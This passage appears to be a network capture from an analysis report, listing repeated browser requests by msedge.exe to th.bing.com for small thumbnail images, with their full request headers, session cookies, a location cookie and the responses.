cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 962
x-check-cacheable: YES
cache-control: public, max-age=1373114
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45437
GET

https://th.bing.com/th?id=ODLS.2eb3a562-e68d-4b64-8755-6c06140f4654&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.2eb3a562-e68d-4b64-8755-6c06140f4654&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1255
cache-control: public, max-age=1379745
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b4543b
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.8e7e59ef-b994-4f32-aa65-a853f1a07e79&w=32&h=32&o=6&pid=AdsPlus

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.8e7e59ef-b994-4f32-aa65-a853f1a07e79&w=32&h=32&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2280
x-check-cacheable: YES
cache-control: public, max-age=476944
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b4543d
GET

https://th.bing.com/th?id=ODLS.bf5004ca-28ef-4f24-b581-5f30431d9014&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.bf5004ca-28ef-4f24-b581-5f30431d9014&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 580
x-check-cacheable: YES
cache-control: public, max-age=488293
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45425
GET

https://th.bing.com/th?id=OVP.qvW2Ux3XcIoIBYbpszLbiAEsCg&w=216&h=120&c=7&bgcl=e1f9a1&r=0&o=6&pid=13.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OVP.qvW2Ux3XcIoIBYbpszLbiAEsCg&w=216&h=120&c=7&bgcl=e1f9a1&r=0&o=6&pid=13.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 609
x-check-cacheable: YES
cache-control: public, max-age=1380315
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45436
GET

https://th.bing.com/th?id=ODLS.87053338-7d3b-4b8e-98ce-56db9a300a3f&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.87053338-7d3b-4b8e-98ce-56db9a300a3f&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 550
cache-control: public, max-age=742154
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b4544f
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.6c0fcfba-a7dd-4efb-baa1-9421f0b0dbd6&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.6c0fcfba-a7dd-4efb-baa1-9421f0b0dbd6&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
